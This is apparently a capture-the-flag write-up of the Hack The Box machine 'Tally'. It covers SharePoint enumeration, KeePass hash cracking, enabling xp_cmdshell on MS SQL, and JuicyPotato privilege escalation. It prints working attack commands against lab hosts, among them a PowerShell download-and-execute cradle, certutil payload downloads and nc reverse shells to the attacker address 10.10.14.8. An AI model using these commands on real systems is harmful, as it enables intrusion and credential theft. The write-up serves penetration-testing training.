Tally
Enumeration
As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.
The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.59 -oN allPorts
-sSuse the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.--min-rate 5000nmap will try to keep the sending rate at or above 5000 packets per second.-p-scanning the entire port range, from 1 to 65535.-T5insane mode, it is the fastest mode of the nmap time template.-Pnassume the host is online.-nscan without reverse DNS resolution.-oNsave the scan result into a file, in this case the allports file.
# Nmap 7.93 scan initiated Mon Nov 7 17:21:56 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.59
Nmap scan report for 10.10.10.59
Host is up (0.054s latency).
Not shown: 65514 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
80/tcp open http
81/tcp open hosts2-ns
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
808/tcp open ccproxy-http
1433/tcp open ms-sql-s
5985/tcp open wsman
15567/tcp open unknown
32843/tcp open unknown
32844/tcp open unknown
32846/tcp open unknown
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
# Nmap done at Mon Nov 7 17:22:10 2022 -- 1 IP address (1 host up) scanned in 14.24 secondsNow that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p21,80,81,135,445,808,1433,5985,15567,32843,32844,32846,47001,49664,49665,49666,49667,49668,49669,49670 10.10.10.59 -oN targeted
-sCperforms the scan using the default set of scripts.-sVenables version detection.-oNsave the scan result into file, in this case the targeted file.
# Nmap 7.93 scan initiated Mon Nov 7 17:24:14 2022 as: nmap -sCV -p21,80,81,135,445,808,1433,5985,15567,32843,32844,32846,47001,49664,49665,49666,49667,49668,49669,49670 -oN targeted 10.10.10.59
Nmap scan report for 10.10.10.59
Host is up (0.34s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 10.0
| http-title: Home
|_Requested resource was http://10.10.10.59/_layouts/15/start.aspx#/default.aspx
|_http-server-header: Microsoft-IIS/10.0
|_http-generator: Microsoft SharePoint
| http-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp open ccproxy-http?
1433/tcp open ms-sql-s Microsoft SQL Server 2016 13.00.1601.00; RTM
|_ssl-date: 2022-11-07T16:25:32+00:00; +1s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-11-07T16:18:15
|_Not valid after: 2052-11-07T16:18:15
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
15567/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
| http-ntlm-info:
| Target_Name: TALLY
| NetBIOS_Domain_Name: TALLY
| NetBIOS_Computer_Name: TALLY
| DNS_Domain_Name: TALLY
| DNS_Computer_Name: TALLY
|_ Product_Version: 10.0.14393
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
| Negotiate
|_ NTLM
32843/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
32844/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after: 9999-01-01T00:00:00
|_ssl-date: 2022-11-07T16:25:32+00:00; +1s from scanner time.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
| tls-alpn:
| h2
|_ http/1.1
32846/tcp open storagecraft-image StorageCraft Image Manager
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-11-07T16:25:23
|_ start_date: 2022-11-07T16:17:53
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov 7 17:25:33 2022 -- 1 IP address (1 host up) scanned in 79.59 secondsThe website shows a SharePoint application.
Doing some research on the internet, I found a pentest report on SharePoint which shows directories such as /_layouts/viewlsts.aspx.
Inside the Documents folder there is one file called ftp-details.docx.
Let's get the content of the document with the docx2text tool.
docx2txt ftp-details.docx
cat ftp-details.txt
FTP details
hostname: tally
workgroup: htb.local
password: UTDRSCH53c"$6hys
Please create your own user folder upon logging inOn the other hand, the SitePages folder contains another item.
http://10.10.10.59/SitePages/Forms/AllPages.aspx
The page contains a message with an FTP username called ftp_user.
http://10.10.10.59/SitePages/FinanceTeam.aspx
Exploitation
Now, we have valid credentials for the FTP server.
ftp ftp_user@10.10.10.59
Connected to 10.10.10.59.
220 Microsoft FTP Service
331 Password required
Password: UTDRSCH53c"$6hys
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50488|)
125 Data connection already open; Transfer starting.
08-31-17 10:51PM <DIR> From-Custodian
10-01-17 10:37PM <DIR> Intranet
08-28-17 05:56PM <DIR> Logs
09-15-17 08:30PM <DIR> To-Upload
09-17-17 08:27PM <DIR> User
226 Transfer complete.As it looks like the content of the FTP server is big, let's mount it to a directory called ftp with curlftpfs.
mkdir ftp
curlftpfs 10.10.10.59 ftp -o user=ftp_user:'UTDRSCH53c"$6hys'
Inside the ftp/User/Tim/Files/ there is one file called tim.kdbx, which is used by KeePass, and may contain some credentials.
ls -la ftp/User/Tim/Files/
total 8
---------- 1 root root 17 Sep 15 2017 bonus.txt
d--------- 1 root root 0 Sep 15 2017 KeePass-2.36
---------- 1 root root 2222 Sep 15 2017 tim.kdbxLet's copy that filw to our current directory, get it's hash, and try to break it with john.
cp ftp/User/Tim/Files/tim.kdbx .
keepass2john tim.kdbx > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
simplementeyo (tim)
1g 0:00:00:48 DONE (2022-11-07 20:04) 0.02060g/s 508.7p/s 508.7c/s 508.7C/s simplementeyo..sept17
Use the "--show" option to display all of the cracked passwords reliably
Session completed.Now that we have the password, let's open the passwords database with keepassxc.
keepassxc tim.kdbx
There is one entry called TALLY ACCT share with the username Finance and the password Acc0unting.
These crednetials are valid for the SMB server.
cme smb 10.10.10.59 -u "Finance" -p "Acc0unting
SMB 10.10.10.59 445 TALLY [*] Windows Server 2016 Standard 14393 x64 (name:TALLY) (domain:TALLY) (signing:False) (SMBv1:True)
SMB 10.10.10.59 445 TALLY [+] TALLY\Finance:Acc0untingBy listing the shares, we'll see that we can read the ACCT share.
smbmap -H 10.10.10.59 -u "Finance" -p "Acc0unting"
[+] IP: 10.10.10.59:445 Name: 10.10.10.59
Disk Permissions Comment
---- ----------- -------
ACCT READ ONLY
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPCLet's create another directory called smb, and mount the ACCT share in it.
mount -t cifs //10.10.10.59/ACCT smb/ -o username=Finance,password=Acc0unting
Inside the smb/zz_Migration/Binaries/New\ folder/ directory there is one binary called tester.exe.
ls -la smb/zz_Migration/Binaries/New\ folder/
total 676316
drwxr-xr-x 2 root root 4096 Sep 21 2017 .
drwxr-xr-x 2 root root 4096 Sep 17 2017 ..
-rwxr-xr-x 1 root root 389188014 Sep 13 2017 crystal_reports_viewer_2016_sp04_51051980.zip
-rwxr-xr-x 1 root root 18159024 Sep 11 2017 Macabacus2016.exe
-rwxr-xr-x 1 root root 21906356 Aug 30 2017 Orchard.Web.1.7.3.zip
-rwxr-xr-x 1 root root 774200 Sep 17 2017 putty.exe
-rwxr-xr-x 1 root root 483824 Sep 15 2017 RpprtSetup.exe
-rwxr-xr-x 1 root root 254599112 Sep 11 2017 tableau-desktop-32bit-10-3-2.exe
-rwxr-xr-x 1 root root 215552 Sep 1 2017 tester.exe
-rwxr-xr-x 1 root root 7194312 Sep 13 2017 vcredist_x64.exeIf we print the strings of the binary, we'll find some credentials for the database server.
strings smb/zz_Migration/Binaries/New\ folder/tester.exe | more
...
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
...Now we could log in to the MS SQL server on port 1433 with the mssqlclient tool from impacket.
impacket-mssqlclient sa@10.10.10.59
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password: GWE3V65#6KFH93@4GWTG2G
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(TALLY): Line 1: Changed database context to 'master'.
[*] INFO(TALLY): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (130 665)
[!] Press help for extra shell commandsWe could try to run commands with xp_cmdshell, but it is disabled.
xp_cmdshell whoami
[-] ERROR(TALLY): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.But we can enable it with enable_xp_cmdshell.
enable_xp_cmdshell
xp_cmdshell whoami
output
--------------------------------------------------------------------------------
tally\sarah
NULLTime to get a shell. First, download the Invoke-PowerShellTcp.ps1 file from Nishang, and add the following function at the end of the script. I will rename the file to rv.ps1.
mv Invoke-PowerShellTcp.ps1 rv.ps1
nano rv.ps1
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 4444Now, set a netcat listener on port 4444 with rlwrap.
rlwrap nc -lvnp 4444
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
And set a simple HTTP server with python on the current directory.
python -m http.server 80
Now, if we run the following command, we should get a reverse shell as the sarah user, and then we'll be able to grab the user flag.
xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadString("http://10.10.14.8/rv.ps1")
Listening on 0.0.0.0 4444
Connection received on 10.10.10.59 50694
Windows PowerShell running as user Sarah on TALLY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Windows\system32>whoami
tally\sarah
PS C:\Windows\system32> type \users\sarah\desktop\user.txt
26bf3a939acfe12a9088270ea0fe2d21Privilege Escalation
Let's start by seeing what privileges the user tolis has.
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set DisabledIf a user has the SeImpersonatePrivilege, the first thing that comes to mind is JuicyPotato.
To escalate privileges, we'll have to transfer JuicyPotato.exe and nc.exe binaries to the victim machine. Let's set a python HTTP server on the directory where we have those binaries.
python -m SimpleHTTPServer
And download the binaries from the desktop folder of the tolis user.
certutil.exe -f -urlcache -split http://10.10.14.8:8000/JuicyPotato.exe JuicyPotato.exe
certutil.exe -f -urlcache -split http://10.10.14.8:8000/nc.exe nc.exe
Before executing the JuicyPotato.exe binary, let's set another netcat listener on port 5555 to catch a reverse shell as the NT AUTHORITY\SYSTEM user.
nc -lvnp 5555
-llisten mode.-vverbose mode.-nnumeric-only IP, no DNS resolution.-pspecify the port to listen on.
Finally, let's run the Juicy Potato binary and get a shell as the NT AUTHORITY\SYSTEM user. Then all we have to do is reap the harvest and take the root flag.
JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c C:\windows\temp\privEsc\nc.exe -e cmd 10.10.14.8 5555"
-tcreateprocess call.-lCOM server listen port.-pprogram to launch.-aspecify command arguments.
Listening on 0.0.0.0 5555
Connection received on 10.10.10.59 50731
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>type \users\administrator\desktop\root.txt
7850cfbb5ab1ddefb5406ff662fecec7Last updated
Was this helpful?